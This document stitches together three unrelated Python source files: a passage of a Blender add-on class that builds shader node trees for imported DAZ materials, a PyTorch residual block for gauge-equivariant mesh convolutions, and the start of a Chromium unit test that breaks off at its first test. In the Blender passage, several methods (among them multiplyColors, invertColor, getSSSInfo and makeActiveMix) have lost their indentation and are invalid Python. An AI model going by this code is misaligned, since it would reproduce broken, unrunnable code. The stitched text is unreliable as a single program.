        radius = rad * 2.0 * LS.scale
        return radius,radtex
#-------------------------------------------------------------
# Transparency
#-------------------------------------------------------------
    def sumColors(self, color, tex, color2, tex2):
        """Componentwise sum of two colors, mixing their textures additively."""
        if tex and tex2:
            tex = self.mixTexs('ADD', tex, tex2)
        elif tex2:
            tex = tex2
        color = Vector(color) + Vector(color2)
        return color,tex
def multiplyColors(self, color, tex, color2, tex2):
if tex and tex2:
tex = self.mixTexs('MULTIPLY', tex, tex2)
elif tex2:
tex = tex2
color = self.compProd(color, color2)
return color,tex
    def getRefractionColor(self):
        """Refraction color/roughness, shared with the glossy channels when
        the material uses shared glossy settings."""
        if self.material.shareGlossy:
            color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE)
            roughness, roughtex = self.getColorTex("getChannelGlossyRoughness", "NONE", 0, False, maxval=1)
        else:
            color,tex = self.getColorTex("getChannelRefractionColor", "COLOR", WHITE)
            roughness,roughtex = self.getColorTex(["Refraction Roughness"], "NONE", 0, False, maxval=1)
        return color, tex, roughness, roughtex
    def addInput(self, node, channel, slot, colorSpace, default, maxval=0):
        """Set *node*'s input *slot* from a channel value and link its
        texture, if any; returns (value, texture)."""
        value,tex = self.getColorTex(channel, colorSpace, default, maxval=maxval)
        if isVector(default):
            node.inputs[slot].default_value[0:3] = value
        else:
            node.inputs[slot].default_value = value
        if tex:
            self.links.new(tex.outputs[0], node.inputs[slot])
        return value,tex
    def setRoughness(self, node, slot, roughness, roughtex, square=True):
        """Set *node*'s roughness *slot*, scaling the roughness texture by the
        value when present.  NOTE(review): *square* is currently unused."""
        node.inputs[slot].default_value = roughness
        if roughtex:
            tex = self.multiplyScalarTex(roughness, roughtex)
            if tex:
                self.links.new(tex.outputs[0], node.inputs[slot])
        return roughness
    def buildRefraction(self):
        """Mix a refraction group over the current shader, optionally
        followed by a fake-caustics group."""
        weight,wttex = self.getColorTex("getChannelRefractionWeight", "NONE", 0.0)
        if weight == 0:
            return
        node,color = self.buildRefractionNode()
        self.mixWithActive(weight, wttex, node)
        if GS.useFakeCaustics and not self.material.thinWall:
            from .cgroup import FakeCausticsGroup
            self.column += 1
            node = self.addGroup(FakeCausticsGroup, "DAZ Fake Caustics", args=[color], force=True)
            self.mixWithActive(weight, wttex, node, keep=True)
    def buildRefractionNode(self):
        """Create the refraction group node, configured for thin-wall or
        solid refraction; returns (node, refraction color)."""
        from .cgroup import RefractionGroup
        self.column += 1
        node = self.addGroup(RefractionGroup, "DAZ Refraction", size=150)
        node.width = 240
        color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE)
        roughness, roughtex = self.getColorTex("getChannelGlossyRoughness", "NONE", 0, False, maxval=1)
        roughness = roughness**2
        self.linkColor(tex, node, color, "Glossy Color")
        self.linkScalar(roughtex, node, roughness, "Glossy Roughness")
        color,coltex,roughness,roughtex = self.getRefractionColor()
        ior,iortex = self.getColorTex("getChannelIOR", "NONE", 1.45)
        roughness = roughness**2
        self.linkColor(coltex, node, color, "Refraction Color")
        self.linkScalar(iortex, node, ior, "Fresnel IOR")
        if self.material.thinWall:
            # Thin wall: no real refraction, blend-mode transparency.
            node.inputs["Thin Wall"].default_value = 1
            node.inputs["Refraction IOR"].default_value = 1.0
            node.inputs["Refraction Roughness"].default_value = 0.0
            self.material.setTransSettings(False, True, color, 0.1)
        else:
            node.inputs["Thin Wall"].default_value = 0
            self.linkScalar(roughtex, node, roughness, "Refraction Roughness")
            self.linkScalar(iortex, node, ior, "Refraction IOR")
            self.material.setTransSettings(True, False, color, 0.2)
        self.linkBumpNormal(node)
        return node, color
    def buildCutout(self):
        """Apply cutout opacity: fully transparent materials replace the
        shader, partial opacity mixes in a transparent group."""
        alpha,tex = self.getColorTex("getChannelCutoutOpacity", "NONE", 1.0)
        if alpha < 1 or tex:
            self.column += 1
            self.useCutout = True
            if alpha == 0:
                node = self.addNode("ShaderNodeBsdfTransparent")
                self.cycles = node
                self.eevee = node
                tex = None
            else:
                from .cgroup import TransparentGroup
                node = self.addGroup(TransparentGroup, "DAZ Transparent")
                self.mixWithActive(alpha, tex, node)
            node.inputs["Color"].default_value[0:3] = WHITE
            if alpha < 1 or tex:
                self.material.setTransSettings(False, False, WHITE, alpha)
            LS.usedFeatures["Transparent"] = True
#-------------------------------------------------------------
# Emission
#-------------------------------------------------------------
    def buildEmission(self):
        """Chain an emission group after the current shader when the emission
        color is not black."""
        if not GS.useEmission:
            return
        color = self.getColor("getChannelEmissionColor", BLACK)
        if not isBlack(color):
            from .cgroup import EmissionGroup
            self.column += 1
            emit = self.addGroup(EmissionGroup, "DAZ Emission")
            self.addEmitColor(emit, "Color")
            strength = self.getLuminance(emit)
            emit.inputs["Strength"].default_value = strength
            self.links.new(self.getCyclesSocket(), emit.inputs["Cycles"])
            self.links.new(self.getEeveeSocket(), emit.inputs["Eevee"])
            self.cycles = self.eevee = emit
            self.addOneSided()
    def addEmitColor(self, emit, slot):
        """Wire the emission color into *emit*'s *slot*, optionally tinted by
        a blackbody node when an emission temperature is set."""
        color,tex = self.getColorTex("getChannelEmissionColor", "COLOR", BLACK)
        if tex is None:
            _,tex = self.getColorTex(["Luminance"], "COLOR", BLACK)
        temp = self.getValue(["Emission Temperature"], None)
        if temp is None:
            self.linkColor(tex, emit, color, slot)
            return
        elif temp == 0:
            # Temperature 0 means "unset"; use a neutral 6500 K instead.
            temp = 6500
        blackbody = self.addNode("ShaderNodeBlackbody", self.column-2)
        blackbody.inputs["Temperature"].default_value = temp
        if isWhite(color) and tex is None:
            self.links.new(blackbody.outputs["Color"], emit.inputs[slot])
        else:
            mult = self.addNode("ShaderNodeMixRGB", self.column-1)
            mult.blend_type = 'MULTIPLY'
            mult.inputs[0].default_value = 1
            self.links.new(blackbody.outputs["Color"], mult.inputs[1])
            self.linkColor(tex, mult, color, 2)
            self.links.new(mult.outputs[0], emit.inputs[slot])
    def getLuminance(self, emit):
        """Convert the Luminance channel into an emission strength according
        to its units; per-area units register the socket for later area
        correction (correctEmitArea)."""
        lum = self.getValue(["Luminance"], 1500)
        # "cd/m^2", "kcd/m^2", "cd/ft^2", "cd/cm^2", "lm", "W"
        units = self.getValue(["Luminance Units"], 3)
        factors = [1, 1000, 10.764, 10000, 1, 1]
        strength = lum/2 * factors[units] / 15000
        if units >= 4:
            self.material.geoemit.append(emit.inputs["Strength"])
            if units == 5:
                strength *= self.getValue(["Luminous Efficacy"], 1)
        return strength
    def addOneSided(self):
        """Chain a one-sided group after the emitter unless the light is
        flagged two-sided."""
        twosided = self.getValue(["Two Sided Light"], False)
        if not twosided:
            from .cgroup import OneSidedGroup
            node = self.addGroup(OneSidedGroup, "DAZ One-Sided")
            self.links.new(self.getCyclesSocket(), node.inputs["Cycles"])
            self.links.new(self.getEeveeSocket(), node.inputs["Eevee"])
            self.cycles = self.eevee = node
#-------------------------------------------------------------
# Volume
#-------------------------------------------------------------
def invertColor(self, color, tex, col):
inverse = (1-color[0], 1-color[1], 1-color[2])
return inverse, self.invertTex(tex, col)
    def buildVolume(self):
        # Build the volumetric (absorption/scatter) part of the material.
        # Skipped for thin-walled surfaces, non-BSDF material methods, or
        # when volumes are globally disabled.
        if (self.material.thinWall or
            GS.materialMethod != "BSDF" or
            not GS.useVolume):
            return
        self.volume = None
        if self.isEnabled("Translucency"):
            transcolor,transtex = self.getColorTex(["Transmitted Color"], "COLOR", BLACK)
            sssmode, ssscolor, ssstex = self.getSSSInfo(transcolor)
            if self.isEnabled("Transmission"):
                self.buildVolumeTransmission(transcolor, transtex)
            if self.isEnabled("Subsurface"):
                self.buildVolumeSubSurface(sssmode, ssscolor, ssstex)
        if self.volume:
            self.volume.width = 240
            LS.usedFeatures["Volume"] = True
def getSSSInfo(self, transcolor):
if self.material.shader == 'UBER_IRAY':
sssmode = self.getValue(["SSS Mode"], 0)
elif self.material.shader == 'PBRSKIN':
sssmode = 1
else:
sssmode = 0
# [ "Mono", "Chromatic" ]
if sssmode == 1:
ssscolor,ssstex = self.getColorTex("getChannelSSSColor", "COLOR", BLACK)
return 1, ssscolor, ssstex
else:
return 0, WHITE, None
    def buildVolumeTransmission(self, transcolor, transtex):
        # Create an absorption volume from the transmitted color channel.
        from .cgroup import VolumeGroup
        dist = self.getValue(["Transmitted Measurement Distance"], 0.0)
        # Pure black/white or zero distance means no visible absorption.
        if not (isBlack(transcolor) or isWhite(transcolor) or dist == 0.0):
            self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
            # NOTE: "Absorbtion" (sic) must match the socket names declared
            # by VolumeGroup -- do not "fix" the spelling here alone.
            self.volume.inputs["Absorbtion Density"].default_value = 100/dist
            self.linkColor(transtex, self.volume, transcolor, "Absorbtion Color")
    def buildVolumeSubSurface(self, sssmode, ssscolor, ssstex):
        # Add scattering to the volume group from the SSS channels.
        from .cgroup import VolumeGroup
        # Scatter density scale differs between shader generations.
        if self.material.shader == 'UBER_IRAY':
            factor = 50
        else:
            factor = 25
        sss = self.getValue(["SSS Amount"], 0.0)
        dist = self.getValue("getChannelScatterDist", 0.0)
        if not (sssmode == 0 or isBlack(ssscolor) or isWhite(ssscolor) or dist == 0.0):
            # Chromatic mode: scatter color is the inverse of the SSS color.
            color,tex = self.invertColor(ssscolor, ssstex, 6)
            if self.volume is None:
                self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
            self.linkColor(tex, self.volume, color, "Scatter Color")
            self.volume.inputs["Scatter Density"].default_value = factor/dist
            self.volume.inputs["Scatter Anisotropy"].default_value = self.getValue(["SSS Direction"], 0)
        elif sss > 0 and dist > 0.0:
            # Mono mode: use the scalar SSS amount as a gray scatter color.
            if self.volume is None:
                self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
            sss,tex = self.getColorTex(["SSS Amount"], "NONE", 0.0)
            color = (sss,sss,sss)
            self.linkColor(tex, self.volume, color, "Scatter Color")
            self.volume.inputs["Scatter Density"].default_value = factor/dist
            self.volume.inputs["Scatter Anisotropy"].default_value = self.getValue(["SSS Direction"], 0)
#-------------------------------------------------------------
# Output
#-------------------------------------------------------------
    def buildOutput(self):
        # Create the material output node(s) and connect surface, volume
        # and displacement to them.
        self.column += 1
        output = self.addNode("ShaderNodeOutputMaterial")
        output.target = 'ALL'
        if self.cycles:
            self.links.new(self.getCyclesSocket(), output.inputs["Surface"])
        if self.volume and not self.useCutout:
            self.links.new(self.volume.outputs[0], output.inputs["Volume"])
        if self.displacement:
            self.links.new(self.displacement, output.inputs["Displacement"])
        if self.liegroups:
            # Drive every LIE (layered image) group alpha from one shared
            # value node so they can be tweaked together.
            node = self.addNode("ShaderNodeValue", col=self.column-1)
            node.outputs[0].default_value = 1.0
            for lie in self.liegroups:
                self.links.new(node.outputs[0], lie.inputs["Alpha"])
        if self.volume or self.eevee:
            # Emit a separate, simpler output node for Eevee and restrict
            # the main (volume-bearing) output to Cycles.
            output.target = 'CYCLES'
            outputEevee = self.addNode("ShaderNodeOutputMaterial")
            outputEevee.target = 'EEVEE'
            if self.eevee:
                self.links.new(self.getEeveeSocket(), outputEevee.inputs["Surface"])
            elif self.cycles:
                self.links.new(self.getCyclesSocket(), outputEevee.inputs["Surface"])
            if self.displacement:
                self.links.new(self.displacement, outputEevee.inputs["Displacement"])
    def buildDisplacementNodes(self):
        # Build the displacement chain from the DAZ displacement channel.
        channel = self.material.getChannelDisplacement()
        if not( channel and
                self.isEnabled("Displacement") and
                GS.useDisplacement):
            return
        tex = self.addTexImageNode(channel, "NONE")
        if tex:
            strength = self.material.getChannelValue(channel, 1)
            if strength == 0:
                return
            dmin = self.getValue("getChannelDispMin", -0.05)
            dmax = self.getValue("getChannelDispMax", 0.05)
            if dmin > dmax:
                # Swap a reversed min/max range.
                tmp = dmin
                dmin = dmax
                dmax = tmp
            from .cgroup import DisplacementGroup
            node = self.addGroup(DisplacementGroup, "DAZ Displacement")
            self.links.new(tex.outputs[0], node.inputs["Texture"])
            node.inputs["Strength"].default_value = strength
            # DAZ units are converted to scene units via the global scale.
            node.inputs["Max"].default_value = LS.scale * dmax
            node.inputs["Min"].default_value = LS.scale * dmin
            self.linkNormal(node)
            self.displacement = node.outputs["Displacement"]
            mat = self.material.rna
            # 'BOTH' = true displacement plus bump shading in Cycles.
            mat.cycles.displacement_method = 'BOTH'
def addSingleTexture(self, col, asset, map, colorSpace):
isnew = False
img = asset.buildCycles(colorSpace)
if img:
imgname = img.name
else:
imgname = asset.getName()
hasMap = asset.hasMapping(map)
texnode = self.getTexNode(imgname, colorSpace)
if not hasMap and texnode:
return texnode, False
else:
texnode = self.addTextureNode(col, img, imgname, colorSpace)
isnew = True
if not hasMap:
self.setTexNode(imgname, texnode, colorSpace)
return texnode, isnew
    def addTextureNode(self, col, img, imgname, colorSpace):
        # Create an image texture node in column `col` showing `img`.
        node = self.addNode("ShaderNodeTexImage", col)
        node.image = img
        node.interpolation = GS.imageInterpolation
        # Show only the trailing path component in the node label.
        node.label = imgname.rsplit("/",1)[-1]
        self.setColorSpace(node, colorSpace)
        node.name = imgname
        if hasattr(node, "image_user"):
            # Pin image sequences to a single, first frame.
            node.image_user.frame_duration = 1
            node.image_user.frame_current = 1
        return node
def setColorSpace(self, node, colorSpace):
if hasattr(node, "color_space"):
node.color_space = colorSpace
    def addImageTexNode(self, filepath, tname, col):
        # Load `filepath` as a non-color image and wrap it in a texture node.
        img = bpy.data.images.load(filepath)
        img.name = os.path.splitext(os.path.basename(filepath))[0]
        img.colorspace_settings.name = "Non-Color"
        return self.addTextureNode(col, img, tname, "NONE")
def getTexNode(self, key, colorSpace):
if key in self.texnodes.keys():
for texnode,colorSpace1 in self.texnodes[key]:
if colorSpace1 == colorSpace:
return texnode
return None
def setTexNode(self, key, texnode, colorSpace):
if key not in self.texnodes.keys():
self.texnodes[key] = []
self.texnodes[key].append((texnode, colorSpace))
    def linkVector(self, texco, node, slot="Vector"):
        # Connect a texture-coordinate source to `node`'s vector input.
        # `texco` may be a socket itself, or a node exposing Vector/UV outputs.
        if (isinstance(texco, bpy.types.NodeSocketVector) or
            isinstance(texco, bpy.types.NodeSocketFloat)):
            self.links.new(texco, node.inputs[slot])
            return
        if "Vector" in texco.outputs.keys():
            self.links.new(texco.outputs["Vector"], node.inputs[slot])
        else:
            self.links.new(texco.outputs["UV"], node.inputs[slot])
    def addTexImageNode(self, channel, colorSpace=None):
        # Return a texture node for `channel`: a single image node when the
        # channel has one texture, or a LIE group node that layers several.
        col = self.column-2
        assets,maps = self.material.getTextures(channel)
        if len(assets) != len(maps):
            print(assets)
            print(maps)
            raise DazError("Bug: Num assets != num maps")
        elif len(assets) == 0:
            return None
        elif len(assets) == 1:
            texnode,isnew = self.addSingleTexture(col, assets[0], maps[0], colorSpace)
            if isnew:
                self.linkVector(self.texco, texnode)
            return texnode
        # Multiple textures: layer them inside a LIE node group.
        from .cgroup import LieGroup
        node = self.addNode("ShaderNodeGroup", col)
        node.width = 240
        try:
            name = os.path.basename(assets[0].map.url)
        except:
            # Asset without a mapped URL; fall back to a generic name.
            name = "Group"
        group = LieGroup()
        group.create(node, name, self)
        self.linkVector(self.texco, node)
        group.addTextureNodes(assets, maps, colorSpace)
        node.inputs["Alpha"].default_value = 1
        self.liegroups.append(node)
        return node
    def mixTexs(self, op, tex1, tex2, slot1=0, slot2=0, color1=None, color2=None, fac=1, factex=None):
        # Blend two textures with a MixRGB node using blend type `op`.
        # With a full, untextured factor, a missing input passes through.
        if fac < 1 or factex:
            pass
        elif tex1 is None:
            return tex2
        elif tex2 is None:
            return tex1
        mix = self.addNode("ShaderNodeMixRGB", self.column-1)
        mix.blend_type = op
        mix.use_alpha = False
        mix.inputs[0].default_value = fac
        if factex:
            # A factor texture overrides the constant factor.
            self.links.new(factex.outputs[0], mix.inputs[0])
        if color1:
            mix.inputs[1].default_value[0:3] = color1
        if tex1:
            # A linked texture overrides the constant color set above.
            self.links.new(tex1.outputs[slot1], mix.inputs[1])
        if color2:
            mix.inputs[2].default_value[0:3] = color2
        if tex2:
            self.links.new(tex2.outputs[slot2], mix.inputs[2])
        return mix
    def mixWithActive(self, fac, tex, shader, useAlpha=False, keep=False):
        # Mix group node `shader` into the currently active Cycles/Eevee
        # shaders, weighted by `fac` (optionally driven by texture `tex`).
        if shader.type != 'GROUP':
            raise RuntimeError("BUG: mixWithActive", shader.type)
        if fac == 0 and tex is None and not keep:
            # Zero constant weight and no texture: nothing to mix in.
            return
        elif fac == 1 and tex is None and not keep:
            # Full weight: the new shader simply replaces the active ones.
            shader.inputs["Fac"].default_value = fac
            self.cycles = shader
            self.eevee = shader
            return
        if self.eevee:
            self.makeActiveMix("Eevee", self.eevee, self.getEeveeSocket(), fac, tex, shader, useAlpha)
        self.eevee = shader
        if self.cycles:
            self.makeActiveMix("Cycles", self.cycles, self.getCyclesSocket(), fac, tex, shader, useAlpha)
        self.cycles = shader
def makeActiveMix(self, slot, active, socket, fac, tex, shader, useAlpha):
self.links.new(socket, shader.inputs[slot])
shader.inputs["Fac"].default_value = fac
if tex:
if useAlpha and "Alpha" in tex.outputs.keys():
texsocket = tex.outputs["Alpha"]
else:
texsocket = tex.outputs[0]
self.links.new(texsocket, shader.inputs["Fac"])
    def linkColor(self, tex, node, color, slot=0):
        # Set a constant color on the input, and optionally link a texture
        # pre-multiplied by that color so both contribute.
        node.inputs[slot].default_value[0:3] = color
        if tex:
            tex = self.multiplyVectorTex(color, tex)
            if tex:
                self.links.new(tex.outputs[0], node.inputs[slot])
        return tex
    def linkScalar(self, tex, node, value, slot):
        # Set a constant scalar on the input, and optionally link a texture
        # pre-multiplied by that value so both contribute.
        node.inputs[slot].default_value = value
        if tex:
            tex = self.multiplyScalarTex(value, tex)
            if tex:
                self.links.new(tex.outputs[0], node.inputs[slot])
        return tex
    def addSlot(self, channel, node, slot, value, value0, invert):
        # Set input `slot` to `value` and, when the channel has a texture,
        # link it scaled by `value0` and optionally inverted.
        node.inputs[slot].default_value = value
        tex = self.addTexImageNode(channel, "NONE")
        if tex:
            tex = self.fixTex(tex, value0, invert)
            if tex:
                self.links.new(tex.outputs[0], node.inputs[slot])
        return tex
def fixTex(self, tex, value, invert):
_,tex = self.multiplySomeTex(value, tex)
if invert:
return self.invertTex(tex, 3)
else:
return tex
def invertTex(self, tex, col):
if tex:
inv = self.addNode("ShaderNodeInvert", col)
self.links.new(tex.outputs[0], inv.inputs["Color"])
return inv
else:
return None
def multiplySomeTex(self, value, tex, slot=0):
if isinstance(value, float) or isinstance(value, int):
if tex and value != 1:
tex = self.multiplyScalarTex(value, tex, slot)
elif tex:
tex = self.multiplyVectorTex(value, tex, slot)
return value,tex
    def multiplyVectorTex(self, color, tex, slot=0, col=None):
        # Multiply texture `tex` by a constant color. White is an identity,
        # black nullifies, and already-processed nodes pass through as is.
        if isWhite(color):
            return tex
        elif isBlack(color):
            return None
        elif (tex and tex.type not in ['TEX_IMAGE', 'GROUP']):
            return tex
        if col is None:
            col = self.column-1
        mix = self.addNode("ShaderNodeMixRGB", col)
        mix.blend_type = 'MULTIPLY'
        mix.inputs[0].default_value = 1.0
        mix.inputs[1].default_value[0:3] = color
        # NOTE(review): `slot` is accepted but outputs[0] is always linked
        # here (unlike multiplyScalarTex) -- confirm this is intentional.
        self.links.new(tex.outputs[0], mix.inputs[2])
        return mix
    def multiplyScalarTex(self, value, tex, slot=0, col=None):
        # Multiply texture `tex` by a scalar via a Math node. 1 is an
        # identity, 0 nullifies, processed nodes pass through unchanged.
        if value == 1:
            return tex
        elif value == 0:
            return None
        elif (tex and tex.type not in ['TEX_IMAGE', 'GROUP']):
            return tex
        if col is None:
            col = self.column-1
        mult = self.addNode("ShaderNodeMath", col)
        mult.operation = 'MULTIPLY'
        mult.inputs[0].default_value = value
        self.links.new(tex.outputs[slot], mult.inputs[1])
        return mult
    def multiplyAddScalarTex(self, factor, term, tex, slot=0, col=None):
        # Compute tex*factor + term, preferring the single MULTIPLY_ADD
        # math operation where this Blender version supports it.
        if col is None:
            col = self.column-1
        mult = self.addNode("ShaderNodeMath", col)
        try:
            # Older Blender versions reject this enum value with TypeError.
            mult.operation = 'MULTIPLY_ADD'
            ok = True
        except TypeError:
            ok = False
        if ok:
            self.links.new(tex.outputs[slot], mult.inputs[0])
            mult.inputs[1].default_value = factor
            mult.inputs[2].default_value = term
            return mult
        else:
            # Fallback: chain separate MULTIPLY and ADD nodes.
            mult.operation = 'MULTIPLY'
            self.links.new(tex.outputs[slot], mult.inputs[0])
            mult.inputs[1].default_value = factor
            add = self.addNode("ShaderNodeMath", col)
            add.operation = 'ADD'
            add.inputs[1].default_value = term
            self.links.new(mult.outputs[slot], add.inputs[0])
            return add
def multiplyTexs(self, tex1, tex2):
if tex1 and tex2:
mult = self.addNode("ShaderNodeMath")
mult.operation = 'MULTIPLY'
self.links.new(tex1.outputs[0], mult.inputs[0])
self.links.new(tex2.outputs[0], mult.inputs[1])
return mult
elif tex1:
return tex1
else:
return tex2
def selectDiffuse(self, marked):
if self.diffuseTex and marked[self.diffuseTex.name]:
self.diffuseTex.select = True
self.nodes.active = self.diffuseTex
def getLink(self, node, slot):
for link in self.links:
if (link.to_node == node and
link.to_socket.name == slot):
return link
return None
def removeLink(self, node, slot):
link = self.getLink(node, slot)
if link:
self.links.remove(link)
def replaceSlot(self, node, slot, value):
node.inputs[slot].default_value = value
self.removeLink(node, slot)
#-------------------------------------------------------------
# Utilities
#-------------------------------------------------------------
def findTree(mat):
    # Wrap an existing material's node tree in a CyclesTree helper so the
    # tree-manipulation methods above can be used on it.
    tree = CyclesTree(None)
    tree.nodes = mat.node_tree.nodes
    tree.links = mat.node_tree.links
    return tree
def findTexco(tree, col):
    # Return the tree's texture-coordinate node, creating one in column
    # `col` when none exists yet.
    nodes = findNodes(tree, "TEX_COORD")
    if nodes:
        return nodes[0]
    else:
        return tree.addNode("ShaderNodeTexCoord", col)
def findNodes(tree, nodeType):
    """Collect all nodes in *tree* whose type equals *nodeType*."""
    return [node for node in tree.nodes.values() if node.type == nodeType]
def findNode(tree, ntypes):
    """Return the first node matching *ntypes* (a type string or list of them)."""
    if isinstance(ntypes, list):
        for ntype in ntypes:
            found = findNode(tree, ntype)
            if found:
                return found
        return None
    for node in tree.nodes:
        if node.type == ntypes:
            return node
    return None
def findLinksFrom(tree, ntype):
    """Return all links originating from nodes of type *ntype*."""
    return [link for link in tree.links if link.from_node.type == ntype]
def findLinksTo(tree, ntype):
    """Return all links terminating at nodes of type *ntype*."""
    return [link for link in tree.links if link.to_node.type == ntype]
def getLinkTo(tree, node, slot):
    """Return the link feeding input socket *slot* of *node*, or None."""
    for link in tree.links:
        if link.to_node == node and link.to_socket.name == slot:
            return link
    return None
def pruneNodeTree(tree):
    """Remove nodes that do not (transitively) feed an output node.

    Returns a dict mapping node name -> True for kept nodes, False for
    removed ones. When the tree has no output node, nothing is removed.
    """
    marked = {}
    output = False
    for node in tree.nodes:
        marked[node.name] = False
        if "Output" in node.name:
            marked[node.name] = True
            output = True
    if not output:
        print("No output node")
        return marked
    # Propagate marks backwards across links until a fixed point: a node
    # is kept if it links (directly or indirectly) into a marked node.
    nmarked = 0
    n = 1
    while n > nmarked:
        nmarked = n
        n = 1
        for link in tree.links:
            if marked[link.to_node.name]:
                marked[link.from_node.name] = True
                n += 1
    # Deselect survivors and delete unmarked nodes. Iterate a snapshot:
    # removing from the live collection while iterating it skips elements.
    for node in list(tree.nodes):
        node.select = False
        if not marked[node.name]:
            tree.nodes.remove(node)
    return marked
|
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All rights reserved.
"""
Adapted from: hsn/nn/harmonic_resnet_block.py by <NAME> at github.com/rubenwiersma/hsn
MIT License
Copyright (c) 2020 rubenwiersma
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from functools import partial
import torch
import torch.nn as nn
from torch.utils.checkpoint import checkpoint
from gem_cnn.nn.gem_conv import GemConv
from gem_cnn.nn.regular_nonlin import RegularNonlinearity
class GemResNetBlock(torch.nn.Module):
    """
    ResNet block with convolutions, linearities, and non-linearities

    Args:
        in_channels (int): number of input features
        out_channels (int): number of output features
        in_order (int): order of input
        out_order (int): order of output
        n_rings (int): number of radial rings
        num_samples (int): number of samples to use for non-linearity. Should be odd
        band_limit (int, optional): maximum theta frequency used
        last_layer (bool): whether to apply final non-linearity
        checkpoint (bool): whether to call GemConv within a torch checkpoint, saving lots of memory
        batch_norm (bool): whether to use batch norm before non-linearities
        batch (int, optional): if not None, compute conv in batches of this size, checkpointed
    """
    def __init__(
        self,
        in_channels,
        out_channels,
        in_order,
        out_order,
        n_rings,
        num_samples,
        band_limit=None,
        last_layer=False,
        checkpoint=False,
        batch_norm=False,
        batch=None,
    ):
        super().__init__()
        self.checkpoint = checkpoint
        # Convolve up to the larger of the two orders, then back down.
        middle_order = max(in_order, out_order)
        self.conv1 = GemConv(
            in_channels,
            out_channels,
            in_order,
            middle_order,
            n_rings,
            band_limit,
            batch,
        )
        self.conv2 = GemConv(
            out_channels,
            out_channels,
            middle_order,
            out_order,
            n_rings,
            band_limit,
            batch,
        )
        # Apply batch norm inside RegularNonLinearity
        if batch_norm:
            act1 = nn.Sequential(nn.BatchNorm1d(out_channels), nn.ReLU())
            act2 = nn.Sequential(nn.BatchNorm1d(out_channels), nn.ReLU())
        else:
            act1 = act2 = nn.ReLU()
        self.nonlin1 = RegularNonlinearity(middle_order, num_samples, act1)
        if last_layer:
            self.nonlin2 = nn.Identity()
        else:
            self.nonlin2 = RegularNonlinearity(out_order, num_samples, act2)
        if in_channels != out_channels:
            self.lin = nn.Conv1d(
                in_channels, out_channels, kernel_size=1
            )  # Equivariant linear map mixing channels
        else:
            self.lin = nn.Identity()
    @staticmethod
    def call_conv_dummy(conv, x, edge_index, precomp, connection, _dummy):
        # `_dummy` exists only to hand checkpoint() a requires_grad input.
        return conv(x, edge_index, precomp, connection)
    def call_conv(self, conv, x, edge_index, precomp, connection):
        # Run the convolution directly, or inside torch.utils.checkpoint
        # to trade recomputation for activation memory.
        if self.checkpoint:
            # Create dummy requires_grad argument to suppress pytorch checkpoint warning
            dummy = torch.zeros(1, device=x.device).requires_grad_()
            return checkpoint(
                partial(self.call_conv_dummy, conv),
                x,
                edge_index,
                precomp,
                connection,
                dummy,
            )
        return conv(x, edge_index, precomp, connection)
    def add_residual(self, y, x):
        # Project the input to out_channels and add it on the rotation
        # orders the two tensors share.
        residual = self.lin(x)
        o = min(y.shape[2], residual.shape[2])
        y[:, :, :o] = y[:, :, :o] + residual[:, :, :o]  # Handle varying orders
        return y
    def forward(self, x, edge_index, precomp, connection):
        """
        Forward pass.

        :param x: [num_v, in_channels, 2*in_order+1]
        :param edge_index: [n_edges, 2]
        :param precomp: [n_edges, 2*band_limit+1, n_rings] computed by GemPrecomp
        :param connection: [num_edges]
        :return: [num_v, out_channels, 2*out_order+1]
        """
        y = self.call_conv(self.conv1, x, edge_index, precomp, connection)
        y = self.nonlin1(y)
        y = self.call_conv(self.conv2, y, edge_index, precomp, connection)
        y = self.add_residual(y, x)
        return self.nonlin2(y)
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from libs import structured_object
class _ObjectA(structured_object.StructuredObject):  # pragma: no cover.
  # Minimal structured object: one serializable attribute `v` of type int.
  v = int
  _unused = 2  # Underscore-prefixed class attribute; not serialized.
  def __init__(self, *args, **kwargs):
    super(_ObjectA, self).__init__(*args, **kwargs)
    self._private_attribute = 10  # Private instance attribute; not serialized.
  @property
  def unused(self):
    # Properties are not serializable attributes either.
    return 4
class _ObjectB(structured_object.StructuredObject):
  # Structured object nesting another structured object (`a`).
  v = dict
  a = _ObjectA
class _DictOfObjectA(structured_object.TypedDict):
  # Typed dict whose values must be _ObjectA instances.
  _value_type = _ObjectA
class _DictOfInt(structured_object.TypedDict):
  # This is just for testing purpose. In practice we should use dict directly.
  _value_type = int
class _ListOfObjectA(structured_object.TypedList):
  # Typed list whose elements must be _ObjectA instances.
  _element_type = _ObjectA
class _ListOfStr(structured_object.TypedList):
  # This is just for testing purpose. In practice we should use list directly.
  _element_type = str
class _ObjectC(structured_object.StructuredObject):
  # Exercises nested typed containers of both structured and builtin types.
  da = _DictOfObjectA
  la = _ListOfObjectA
  d = _DictOfInt
  l = _ListOfStr
class _Future(object):
  # Opaque placeholder type used to exercise custom type-validation hooks.
  pass
class SerilizableObjectTest(unittest.TestCase):
  """Tests for StructuredObject/TypedDict/TypedList (de)serialization.

  Fixes over the previous revision:
  * `assertEquals` (removed in Python 3.12) replaced with `assertEqual`.
  * testFromSerializableUndefinedAttributeAllowed now restores the
    class-level `_ignore_unknown_attributes` flag so it cannot leak into
    other tests.
  """

  def testAttributeCached(self):
    dynamic_definitions_attr_name = '_%s.%s._dynamic_definitions' % (
